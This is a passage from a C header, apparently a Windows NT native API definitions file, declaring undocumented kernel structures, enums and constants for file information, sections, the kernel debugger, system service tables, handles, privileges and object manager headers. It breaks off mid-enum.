| 1600 | typedef struct _FILE_QUOTA_INFORMATION { 1601 | ULONG NextEntryOffset; 1602 | ULONG SidLength; 1603 | LARGE_INTEGER ChangeTime; 1604 | LARGE_INTEGER QuotaUsed; 1605 | LARGE_INTEGER QuotaThreshold; 1606 | LARGE_INTEGER QuotaLimit; 1607 | SID Sid; 1608 | } FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION; 1609 | 1610 | typedef struct _FILE_DIRECTORY_INFORMATION { 1611 | ULONG NextEntryOffset; 1612 | ULONG FileIndex; 1613 | LARGE_INTEGER CreationTime; 1614 | LARGE_INTEGER LastAccessTime; 1615 | LARGE_INTEGER LastWriteTime; 1616 | LARGE_INTEGER ChangeTime; 1617 | LARGE_INTEGER EndOfFile; 1618 | LARGE_INTEGER AllocationSize; 1619 | ULONG FileAttributes; 1620 | ULONG FileNameLength; 1621 | WCHAR FileName[1]; 1622 | } FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; 1623 | 1624 | typedef struct _FILE_FULL_DIR_INFORMATION { 1625 | ULONG NextEntryOffset; 1626 | ULONG FileIndex; 1627 | LARGE_INTEGER CreationTime; 1628 | LARGE_INTEGER LastAccessTime; 1629 | LARGE_INTEGER LastWriteTime; 1630 | LARGE_INTEGER ChangeTime; 1631 | LARGE_INTEGER EndOfFile; 1632 | LARGE_INTEGER AllocationSize; 1633 | ULONG FileAttributes; 1634 | ULONG FileNameLength; 1635 | ULONG EaSize; 1636 | WCHAR FileName[1]; 1637 | } FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION; 1638 | 1639 | typedef struct _FILE_ID_FULL_DIR_INFORMATION { 1640 | ULONG NextEntryOffset; 1641 | ULONG FileIndex; 1642 | LARGE_INTEGER CreationTime; 1643 | LARGE_INTEGER LastAccessTime; 1644 | LARGE_INTEGER LastWriteTime; 1645 | LARGE_INTEGER ChangeTime; 1646 | LARGE_INTEGER EndOfFile; 1647 | LARGE_INTEGER AllocationSize; 1648 | ULONG FileAttributes; 1649 | ULONG FileNameLength; 1650 | ULONG EaSize; 1651 | LARGE_INTEGER FileId; 1652 | WCHAR FileName[1]; 1653 | } FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION; 1654 | 1655 | typedef struct _FILE_BOTH_DIR_INFORMATION { 1656 | ULONG NextEntryOffset; 1657 | ULONG FileIndex; 1658 | LARGE_INTEGER CreationTime; 1659 | LARGE_INTEGER LastAccessTime; 1660 | LARGE_INTEGER LastWriteTime; 1661 | LARGE_INTEGER ChangeTime; 1662 | LARGE_INTEGER EndOfFile; 1663 | LARGE_INTEGER AllocationSize; 1664 | ULONG FileAttributes; 1665 | ULONG FileNameLength; 1666 | ULONG EaSize; 1667 | CCHAR ShortNameLength; 1668 | WCHAR ShortName[12]; 1669 | WCHAR FileName[1]; 1670 | } FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; 1671 | 1672 | typedef struct _FILE_ID_BOTH_DIR_INFORMATION { 1673 | ULONG NextEntryOffset; 1674 | ULONG FileIndex; 1675 | LARGE_INTEGER CreationTime; 1676 | LARGE_INTEGER LastAccessTime; 1677 | LARGE_INTEGER LastWriteTime; 1678 | LARGE_INTEGER ChangeTime; 1679 | LARGE_INTEGER EndOfFile; 1680 | LARGE_INTEGER AllocationSize; 1681 | ULONG FileAttributes; 1682 | ULONG FileNameLength; 1683 | ULONG EaSize; 1684 | CCHAR ShortNameLength; 1685 | WCHAR ShortName[12]; 1686 | LARGE_INTEGER FileId; 1687 | WCHAR FileName[1]; 1688 | } FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION; 1689 | 1690 | typedef struct _FILE_NAMES_INFORMATION { 1691 | ULONG NextEntryOffset; 1692 | ULONG FileIndex; 1693 | ULONG FileNameLength; 1694 | WCHAR FileName[1]; 1695 | } FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION; 1696 | 1697 | typedef struct _FILE_OBJECTID_INFORMATION { 1698 | LONGLONG FileReference; 1699 | UCHAR ObjectId[16]; 1700 | union { 1701 | struct { 1702 | UCHAR BirthVolumeId[16]; 1703 | UCHAR BirthObjectId[16]; 1704 | UCHAR DomainId[16]; 1705 | }; 1706 | UCHAR ExtendedInfo[48]; 1707 | }; 1708 | } FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION; 1709 | 1710 | typedef struct _FILE_FS_VOLUME_INFORMATION { 1711 | LARGE_INTEGER VolumeCreationTime; 1712 | ULONG VolumeSerialNumber; 1713 | ULONG VolumeLabelLength; 1714 | BOOLEAN SupportsObjects; 1715 | WCHAR VolumeLabel[1]; 1716 | } FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION; 1717 | 1718 | /* 1719 | ** File END 1720 | */ 1721 | 1722 | /* 1723 | ** Section START 1724 | */ 1725 | 1726 | #ifndef _SECTION_INFORMATION_CLASS 1727 | typedef enum _SECTION_INFORMATION_CLASS { 1728 | SectionBasicInformation, 1729 | SectionImageInformation, 1730 | SectionRelocationInformation, 1731 | MaxSectionInfoClass 1732 | } SECTION_INFORMATION_CLASS; 1733 | #endif 1734 | 1735 | typedef struct _SECTIONBASICINFO { 1736 | PVOID BaseAddress; 1737 | ULONG AllocationAttributes; 1738 | LARGE_INTEGER MaximumSize; 1739 | } SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION; 1740 | 1741 | typedef struct _SECTION_IMAGE_INFORMATION { 1742 | PVOID TransferAddress; 1743 | ULONG ZeroBits; 1744 | SIZE_T MaximumStackSize; 1745 | SIZE_T CommittedStackSize; 1746 | ULONG SubSystemType; 1747 | union { 1748 | struct { 1749 | USHORT SubSystemMinorVersion; 1750 | USHORT SubSystemMajorVersion; 1751 | }; 1752 | ULONG SubSystemVersion; 1753 | }; 1754 | ULONG GpValue; 1755 | USHORT ImageCharacteristics; 1756 | USHORT DllCharacteristics; 1757 | USHORT Machine; 1758 | BOOLEAN ImageContainsCode; 1759 | BOOLEAN Spare1; 1760 | ULONG LoaderFlags; 1761 | ULONG ImageFileSize; 1762 | ULONG Reserved[1]; 1763 | } SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; 1764 | 1765 | typedef struct _SECTION_IMAGE_INFORMATION64 { 1766 | ULONGLONG TransferAddress; 1767 | ULONG ZeroBits; 1768 | ULONGLONG MaximumStackSize; 1769 | ULONGLONG CommittedStackSize; 1770 | ULONG SubSystemType; 1771 | union { 1772 | struct { 1773 | USHORT SubSystemMinorVersion; 1774 | USHORT SubSystemMajorVersion; 1775 | }; 1776 | ULONG SubSystemVersion; 1777 | }; 1778 | ULONG GpValue; 1779 | USHORT ImageCharacteristics; 1780 | USHORT DllCharacteristics; 1781 | USHORT Machine; 1782 | BOOLEAN ImageContainsCode; 1783 | BOOLEAN Spare1; 1784 | ULONG LoaderFlags; 1785 | ULONG ImageFileSize; 1786 | ULONG Reserved[1]; 1787 | } SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64; 1788 | 1789 | typedef enum _SECTION_INHERIT { 1790 | ViewShare = 1, 1791 | ViewUnmap = 2 1792 | } SECTION_INHERIT; 1793 | 1794 | #define SEC_BASED 0x200000 1795 | #define SEC_NO_CHANGE 0x400000 1796 | #define SEC_FILE 0x800000 1797 | #define SEC_IMAGE 0x1000000 1798 | #define SEC_RESERVE 0x4000000 1799 | #define SEC_COMMIT 0x8000000 1800 | #define SEC_NOCACHE 0x10000000 1801 | #define SEC_GLOBAL 0x20000000 1802 | #define SEC_LARGE_PAGES 0x80000000 1803 | 1804 | /* 1805 | ** Section END 1806 | */ 1807 | 1808 | /* 1809 | ** Kernel Debugger START 1810 | */ 1811 | 1812 | #ifndef _SYSDBG_COMMAND 1813 | typedef enum _SYSDBG_COMMAND { 1814 | SysDbgQueryModuleInformation, 1815 | SysDbgQueryTraceInformation, 1816 | SysDbgSetTracepoint, 1817 | SysDbgSetSpecialCall, 1818 | SysDbgClearSpecialCalls, 1819 | SysDbgQuerySpecialCalls, 1820 | SysDbgBreakPoint, 1821 | SysDbgQueryVersion, 1822 | SysDbgReadVirtual, 1823 | SysDbgWriteVirtual, 1824 | SysDbgReadPhysical, 1825 | SysDbgWritePhysical, 1826 | SysDbgReadControlSpace, 1827 | SysDbgWriteControlSpace, 1828 | SysDbgReadIoSpace, 1829 | SysDbgWriteIoSpace, 1830 | SysDbgReadMsr, 1831 | SysDbgWriteMsr, 1832 | SysDbgReadBusData, 1833 | SysDbgWriteBusData, 1834 | SysDbgCheckLowMemory, 1835 | SysDbgEnableKernelDebugger, 1836 | SysDbgDisableKernelDebugger, 1837 | SysDbgGetAutoKdEnable, 1838 | SysDbgSetAutoKdEnable, 1839 | SysDbgGetPrintBufferSize, 1840 | SysDbgSetPrintBufferSize, 1841 | SysDbgGetKdUmExceptionEnable, 1842 | SysDbgSetKdUmExceptionEnable, 1843 | SysDbgGetTriageDump, 1844 | SysDbgGetKdBlockEnable, 1845 | SysDbgSetKdBlockEnable, 1846 | SysDbgRegisterForUmBreakInfo, 1847 | SysDbgGetUmBreakPid, 1848 | SysDbgClearUmBreakPid, 1849 | SysDbgGetUmAttachPid, 1850 | SysDbgClearUmAttachPid 1851 | } SYSDBG_COMMAND, *PSYSDBG_COMMAND; 1852 | #endif 1853 | 1854 | #ifndef _SYSDBG_VIRTUAL 1855 | typedef struct _SYSDBG_VIRTUAL 1856 | { 1857 | PVOID Address; 1858 | PVOID Buffer; 1859 | ULONG Request; 1860 | } SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL; 1861 | #endif 1862 | 1863 | /* 1864 | ** Kernel Debugger END 1865 | */ 1866 | 1867 | /* 1868 | ** System Table START 1869 | */ 1870 | #define NUMBER_SERVICE_TABLES 2 1871 | #define SERVICE_NUMBER_MASK ((1 << 12) - 1) 1872 | 1873 | #if defined(_WIN64) 1874 | 1875 | #if defined(_AMD64_) 1876 | 1877 | #define SERVICE_TABLE_SHIFT (12 - 4) 1878 | #define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4) 1879 | #define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4) 1880 | 1881 | #else 1882 | 1883 | #define SERVICE_TABLE_SHIFT (12 - 5) 1884 | #define SERVICE_TABLE_MASK (((1 << 1) - 1) << 5) 1885 | #define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 5) 1886 | 1887 | #endif 1888 | 1889 | #else 1890 | 1891 | #define SERVICE_TABLE_SHIFT (12 - 4) 1892 | #define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4) 1893 | #define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4) 1894 | 1895 | #endif 1896 | 1897 | typedef struct _KSERVICE_TABLE_DESCRIPTOR { 1898 | ULONG_PTR Base; //e.g. KiServiceTable 1899 | PULONG Count; 1900 | ULONG Limit;//e.g. KiServiceLimit 1901 | PUCHAR Number; //e.g. KiArgumentTable 1902 | } KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR; 1903 | /* 1904 | ** System Table END 1905 | */ 1906 | 1907 | 1908 | /* 1909 | ** System Boot Environment START 1910 | */ 1911 | 1912 | typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 // Size=20 1913 | { 1914 | struct _GUID BootIdentifier; 1915 | enum _FIRMWARE_TYPE FirmwareType; 1916 | } SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1; 1917 | 1918 | typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION // Size=32 1919 | { 1920 | struct _GUID BootIdentifier; 1921 | enum _FIRMWARE_TYPE FirmwareType; 1922 | unsigned __int64 BootFlags; 1923 | } SYSTEM_BOOT_ENVIRONMENT_INFORMATION, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION; 1924 | 1925 | /* 1926 | ** System Boot Environment END 1927 | */ 1928 | 1929 | /* 1930 | ** Mutant START 1931 | */ 1932 | 1933 | #ifndef _MUTANT_INFORMATION_CLASS 1934 | typedef enum _MUTANT_INFORMATION_CLASS { 1935 | MutantBasicInformation 1936 | } MUTANT_INFORMATION_CLASS; 1937 | #endif 1938 | 1939 | #ifndef _MUTANT_BASIC_INFORMATION 1940 | typedef struct _MUTANT_BASIC_INFORMATION { 1941 | LONG CurrentCount; 1942 | BOOLEAN OwnedByCaller; 1943 | BOOLEAN AbandonedState; 1944 | } MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION; 1945 | #endif 1946 | 1947 | /* 1948 | ** Mutant END 1949 | */ 1950 | 1951 | /* 1952 | ** Key START 1953 | */ 1954 | 1955 | #ifndef _KEY_INFORMATION_CLASS 1956 | typedef enum _KEY_INFORMATION_CLASS { 1957 | KeyBasicInformation, 1958 | KeyNodeInformation, 1959 | KeyFullInformation, 1960 | KeyNameInformation, 1961 | KeyCachedInformation, 1962 | KeyFlagsInformation, 1963 | MaxKeyInfoClass 1964 | } KEY_INFORMATION_CLASS; 1965 | #endif 1966 | 1967 | #ifndef _KEY_FULL_INFORMATION 1968 | typedef struct _KEY_FULL_INFORMATION { 1969 | LARGE_INTEGER LastWriteTime; 1970 | ULONG TitleIndex; 1971 | ULONG ClassOffset; 1972 | ULONG ClassLength; 1973 | ULONG SubKeys; 1974 | ULONG MaxNameLen; 1975 | ULONG MaxClassLen; 1976 | ULONG Values; 1977 | ULONG MaxValueNameLen; 1978 | ULONG MaxValueDataLen; 1979 | WCHAR Class[1]; 1980 | } KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION; 1981 | #endif 1982 | 1983 | #ifndef _KEY_BASIC_INFORMATION 1984 | typedef struct _KEY_BASIC_INFORMATION { 1985 | LARGE_INTEGER LastWriteTime; 1986 | ULONG TitleIndex; 1987 | ULONG NameLength; 1988 | WCHAR Name[1]; 1989 | } KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION; 1990 | #endif 1991 | 1992 | #ifndef _KEY_VALUE_INFORMATION_CLASS 1993 | typedef enum _KEY_VALUE_INFORMATION_CLASS { 1994 | KeyValueBasicInformation, 1995 | KeyValueFullInformation, 1996 | KeyValuePartialInformation, 1997 | KeyValueFullInformationAlign64, 1998 | KeyValuePartialInformationAlign64, 1999 | MaxKeyValueInfoClass 2000 | } KEY_VALUE_INFORMATION_CLASS; 2001 | #endif 2002 | 2003 | #ifndef _KEY_VALUE_BASIC_INFORMATION 2004 | typedef struct _KEY_VALUE_BASIC_INFORMATION { 2005 | ULONG TitleIndex; 2006 | ULONG Type; 2007 | ULONG NameLength; 2008 | WCHAR Name[1]; // Variable size 2009 | } KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION; 2010 | #endif 2011 | 2012 | #ifndef _KEY_VALUE_FULL_INFORMATION 2013 | typedef struct _KEY_VALUE_FULL_INFORMATION { 2014 | ULONG TitleIndex; 2015 | ULONG Type; 2016 | ULONG DataOffset; 2017 | ULONG DataLength; 2018 | ULONG NameLength; 2019 | WCHAR Name[1]; // Variable size 2020 | // Data[1]; // Variable size data not declared 2021 | } KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; 2022 | #endif 2023 | 2024 | #ifndef _KEY_VALUE_PARTIAL_INFORMATION 2025 | typedef struct _KEY_VALUE_PARTIAL_INFORMATION { 2026 | ULONG TitleIndex; 2027 | ULONG Type; 2028 | ULONG DataLength; 2029 | UCHAR Data[1]; // Variable size 2030 | } KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION; 2031 | #endif 2032 | 2033 | #ifndef _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 2034 | typedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 { 2035 | ULONG Type; 2036 | ULONG DataLength; 2037 | UCHAR Data[1]; // Variable size 2038 | } KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64; 2039 | #endif 2040 | 2041 | #ifndef _KEY_VALUE_ENTRY 2042 | typedef struct _KEY_VALUE_ENTRY { 2043 | PUNICODE_STRING ValueName; 2044 | ULONG DataLength; 2045 | ULONG DataOffset; 2046 | ULONG Type; 2047 | } KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY; 2048 | #endif 2049 | 2050 | /* 2051 | ** Key END 2052 | */ 2053 | 2054 | /* 2055 | ** IoCompletion START 2056 | */ 2057 | 2058 | #ifndef _IO_COMPLETION_INFORMATION_CLASS 2059 | typedef enum _IO_COMPLETION_INFORMATION_CLASS { 2060 | IoCompletionBasicInformation 2061 | } IO_COMPLETION_INFORMATION_CLASS; 2062 | #endif 2063 | 2064 | #ifndef _IO_COMPLETION_BASIC_INFORMATION 2065 | typedef struct _IO_COMPLETION_BASIC_INFORMATION { 2066 | LONG Depth; 2067 | } IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION; 2068 | #endif 2069 | 2070 | /* 2071 | ** IoCompletion END 2072 | */ 2073 | 2074 | /* 2075 | ** Event START 2076 | */ 2077 | 2078 | // 2079 | // Event Specific Access Rights. 2080 | // 2081 | 2082 | typedef enum _EVENT_INFORMATION_CLASS { 2083 | EventBasicInformation 2084 | } EVENT_INFORMATION_CLASS; 2085 | 2086 | typedef enum _EVENT_TYPE { 2087 | NotificationEvent, 2088 | SynchronizationEvent 2089 | } EVENT_TYPE; 2090 | 2091 | typedef struct _EVENT_BASIC_INFORMATION { 2092 | EVENT_TYPE EventType; 2093 | LONG EventState; 2094 | } EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION; 2095 | 2096 | /* 2097 | ** Event END 2098 | */ 2099 | 2100 | /* 2101 | ** TIME_FIELDS START 2102 | */ 2103 | 2104 | #ifndef CSHORT 2105 | typedef short CSHORT; 2106 | #endif 2107 | typedef struct _TIME_FIELDS { 2108 | CSHORT Year; // range [1601...] 2109 | CSHORT Month; // range [1..12] 2110 | CSHORT Day; // range [1..31] 2111 | CSHORT Hour; // range [0..23] 2112 | CSHORT Minute; // range [0..59] 2113 | CSHORT Second; // range [0..59] 2114 | CSHORT Milliseconds;// range [0..999] 2115 | CSHORT Weekday; // range [0..6] == [Sunday..Saturday] 2116 | } TIME_FIELDS; 2117 | typedef TIME_FIELDS *PTIME_FIELDS; 2118 | 2119 | /* 2120 | ** TIME_FIELDS END 2121 | */ 2122 | typedef struct _SYSTEM_MODULE_ENTRY_INFO 2123 | { 2124 | HANDLE Section; 2125 | PVOID MappedBase; 2126 | PVOID ImageBase; 2127 | ULONG ImageSize; 2128 | ULONG Flags; 2129 | USHORT LoadOrderIndex; 2130 | USHORT InitOrderIndex; 2131 | USHORT LoadCount; 2132 | USHORT OffsetToFileName; 2133 | UCHAR FullPathName[256]; 2134 | } SYSTEM_MODULE_ENTRY_INFO, *PSYSTEM_MODULE_ENTRY_INFO; 2135 | 2136 | typedef struct _SYSTEM_MODULE_INFORMATION 2137 | { 2138 | ULONG NumberOfModules; 2139 | SYSTEM_MODULE_ENTRY_INFO Modules[1]; 2140 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 2141 | /* 2142 | ** HANDLE START 2143 | */ 2144 | 2145 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { 2146 | USHORT UniqueProcessId; 2147 | USHORT CreatorBackTraceIndex; 2148 | UCHAR ObjectTypeIndex; 2149 | UCHAR HandleAttributes; 2150 | USHORT HandleValue; 2151 | PVOID Object; 2152 | ULONG GrantedAccess; 2153 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; 2154 | 2155 | typedef struct _SYSTEM_HANDLE_INFORMATION { 2156 | ULONG NumberOfHandles; 2157 | SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; 2158 | } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; 2159 | 2160 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { 2161 | PVOID Object; 2162 | ULONG_PTR UniqueProcessId; 2163 | ULONG_PTR HandleValue; 2164 | ULONG GrantedAccess; 2165 | USHORT CreatorBackTraceIndex; 2166 | USHORT ObjectTypeIndex; 2167 | ULONG HandleAttributes; 2168 | ULONG Reserved; 2169 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; 2170 | 2171 | typedef struct _SYSTEM_HANDLE_INFORMATION_EX { 2172 | ULONG_PTR NumberOfHandles; 2173 | ULONG_PTR Reserved; 2174 | SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; 2175 | } SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX; 2176 | 2177 | /* 2178 | ** HANDLE END 2179 | */ 2180 | 2181 | // Privileges 2182 | 2183 | #define SE_MIN_WELL_KNOWN_PRIVILEGE (2L) 2184 | #define SE_CREATE_TOKEN_PRIVILEGE (2L) 2185 | #define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L) 2186 | #define SE_LOCK_MEMORY_PRIVILEGE (4L) 2187 | #define SE_INCREASE_QUOTA_PRIVILEGE (5L) 2188 | #define SE_MACHINE_ACCOUNT_PRIVILEGE (6L) 2189 | #define SE_TCB_PRIVILEGE (7L) 2190 | #define SE_SECURITY_PRIVILEGE (8L) 2191 | #define SE_TAKE_OWNERSHIP_PRIVILEGE (9L) 2192 | #define SE_LOAD_DRIVER_PRIVILEGE (10L) 2193 | #define SE_SYSTEM_PROFILE_PRIVILEGE (11L) 2194 | #define SE_SYSTEMTIME_PRIVILEGE (12L) 2195 | #define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L) 2196 | #define SE_INC_BASE_PRIORITY_PRIVILEGE (14L) 2197 | #define SE_CREATE_PAGEFILE_PRIVILEGE (15L) 2198 | #define SE_CREATE_PERMANENT_PRIVILEGE (16L) 2199 | #define SE_BACKUP_PRIVILEGE (17L) 2200 | #define SE_RESTORE_PRIVILEGE (18L) 2201 | #define SE_SHUTDOWN_PRIVILEGE (19L) 2202 | #define SE_DEBUG_PRIVILEGE (20L) 2203 | #define SE_AUDIT_PRIVILEGE (21L) 2204 | #define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L) 2205 | #define SE_CHANGE_NOTIFY_PRIVILEGE (23L) 2206 | #define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L) 2207 | #define SE_UNDOCK_PRIVILEGE (25L) 2208 | #define SE_SYNC_AGENT_PRIVILEGE (26L) 2209 | #define SE_ENABLE_DELEGATION_PRIVILEGE (27L) 2210 | #define SE_MANAGE_VOLUME_PRIVILEGE (28L) 2211 | #define SE_IMPERSONATE_PRIVILEGE (29L) 2212 | #define SE_CREATE_GLOBAL_PRIVILEGE (30L) 2213 | #define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L) 2214 | #define SE_RELABEL_PRIVILEGE (32L) 2215 | #define SE_INC_WORKING_SET_PRIVILEGE (33L) 2216 | #define SE_TIME_ZONE_PRIVILEGE (34L) 2217 | #define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L) 2218 | #define SE_MAX_WELL_KNOWN_PRIVILEGE SE_CREATE_SYMBOLIC_LINK_PRIVILEGE 2219 | 2220 | #ifndef NT_SUCCESS 2221 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 2222 | #endif 2223 | 2224 | /* 2225 | ** OBJECT MANAGER START 2226 | */ 2227 | 2228 | // 2229 | // Header flags 2230 | // 2231 | 2232 | #define OB_FLAG_NEW_OBJECT 0x01 2233 | #define OB_FLAG_KERNEL_OBJECT 0x02 2234 | #define OB_FLAG_CREATOR_INFO 0x04 2235 | #define OB_FLAG_EXCLUSIVE_OBJECT 0x08 2236 | #define OB_FLAG_PERMANENT_OBJECT 0x10 2237 | #define OB_FLAG_DEFAULT_SECURITY_QUOTA 0x20 2238 | #define OB_FLAG_SINGLE_HANDLE_ENTRY 0x40 2239 | #define OB_FLAG_DELETED_INLINE 0x80 2240 | 2241 | // 2242 | // InfoMask values 2243 | // 2244 | 2245 | #define OB_INFOMASK_PROCESS_INFO 0x10 2246 | #define OB_INFOMASK_QUOTA 0x08 2247 | #define OB_INFOMASK_HANDLE 0x04 2248 | #define OB_INFOMASK_NAME 0x02 2249 | #define OB_INFOMASK_CREATOR_INFO 0x01 2250 | 2251 | typedef PVOID *PDEVICE_MAP; 2252 | 2253 | typedef struct _OBJECT_DIRECTORY_ENTRY { 2254 | PVOID ChainLink; 2255 | PVOID Object; 2256 | ULONG HashValue; 2257 | } OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY; 2258 | 2259 | typedef struct _EX_PUSH_LOCK { 2260 | union 2261 | { 2262 | ULONG Locked : 1; 2263 | ULONG Waiting : 1; 2264 | ULONG Waking : 1; 2265 | ULONG MultipleShared : 1; 2266 | ULONG Shared : 28; 2267 | ULONG Value; 2268 | PVOID Ptr; 2269 | }; 2270 | } EX_PUSH_LOCK, *PEX_PUSH_LOCK; 2271 | 2272 | typedef struct _OBJECT_NAMESPACE_LOOKUPTABLE { 2273 | LIST_ENTRY HashBuckets[37]; 2274 | EX_PUSH_LOCK Lock; 2275 | ULONG NumberOfPrivateSpaces; 2276 | } OBJECT_NAMESPACE_LOOKUPTABLE, *POBJECT_NAMESPACE_LOOKUPTABLE; 2277 | 2278 | typedef struct _OBJECT_NAMESPACE_ENTRY { 2279 | LIST_ENTRY ListEntry; 2280 | PVOID NamespaceRootDirectory; 2281 | ULONG SizeOfBoundaryInformation; 2282 | ULONG Reserved; 2283 | UCHAR HashValue; 2284 | ULONG Alignment; 2285 | } OBJECT_NAMESPACE_ENTRY, *POBJECT_NAMESPACE_ENTRY; 2286 | 2287 | typedef struct _OBJECT_DIRECTORY { 2288 | POBJECT_DIRECTORY_ENTRY HashBuckets[37]; 2289 | EX_PUSH_LOCK Lock; 2290 | PDEVICE_MAP DeviceMap; 2291 | ULONG SessionId; 2292 | PVOID NamespaceEntry; 2293 | ULONG Flags; 2294 | } OBJECT_DIRECTORY, *POBJECT_DIRECTORY; 2295 | 2296 | typedef struct _OBJECT_HEADER_NAME_INFO { 2297 | POBJECT_DIRECTORY Directory; 2298 | UNICODE_STRING Name; 2299 | ULONG QueryReferences; 2300 | } OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO; 2301 | 2302 | typedef struct _OBJECT_HEADER_CREATOR_INFO {// Size=32 2303 | LIST_ENTRY TypeList; // Size=16 Offset=0 2304 | PVOID CreatorUniqueProcess; // Size=8 Offset=16 2305 | USHORT CreatorBackTraceIndex; // Size=2 Offset=24 2306 | USHORT Reserved; // Size=2 Offset=26 2307 | } OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO; 2308 | 2309 | typedef struct _OBJECT_HANDLE_COUNT_ENTRY {// Size=16 2310 | PVOID Process; // Size=8 Offset=0 2311 | struct 2312 | { 2313 | unsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24 2314 | unsigned long LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8 2315 | }; 2316 | } OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY; 2317 | 2318 | typedef struct _OBJECT_HEADER_HANDLE_INFO // Size=16 2319 | { 2320 | union 2321 | { 2322 | PVOID HandleCountDataBase; // Size=8 Offset=0 2323 | struct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0 2324 | }; 2325 | } OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO; 2326 | 2327 | typedef struct _OBJECT_HEADER_PROCESS_INFO { // Size=16 2328 | PVOID ExclusiveProcess; // Size=8 Offset=0 2329 | unsigned __int64 Reserved; // Size=8 Offset=8 2330 | } OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO; 2331 | 2332 | typedef struct _OBJECT_HEADER_QUOTA_INFO { 2333 | ULONG PagedPoolCharge; //4 2334 | ULONG NonPagedPoolCharge; //4 2335 | ULONG SecurityDescriptorCharge; //4 2336 | PVOID SecurityDescriptorQuotaBlock; //sizeof(pointer) 2337 | unsigned __int64 Reserved; //sizeof(uint64) 2338 | } OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO; 2339 | 2340 | typedef struct _QUAD { 2341 | union 2342 | { 2343 | INT64 UseThisFieldToCopy; 2344 | float DoNotUseThisField; 2345 | }; 2346 | } QUAD, *PQUAD; 2347 | 2348 | typedef struct _OBJECT_CREATE_INFORMATION { 2349 | ULONG Attributes; 2350 | PVOID RootDirectory; 2351 | CHAR ProbeMode; 2352 | ULONG PagedPoolCharge; 2353 | ULONG NonPagedPoolCharge; 2354 | ULONG SecurityDescriptorCharge; 2355 | PVOID SecurityDescriptor; 2356 | PSECURITY_QUALITY_OF_SERVICE SecurityQos; 2357 | SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; 2358 | } OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION; 2359 | 2360 | typedef enum _POOL_TYPE { 2361 | NonPagedPool = 0, 2362 | NonPagedPoolExecute = 0, 2363 | PagedPool = 1, 2364 | NonPagedPoolMustSucceed = 2, 2365 | DontUseThisType = 3, 2366 | NonPagedPoolCacheAligned = 4, 2367 | PagedPoolCacheAligned = 5, 2368 | 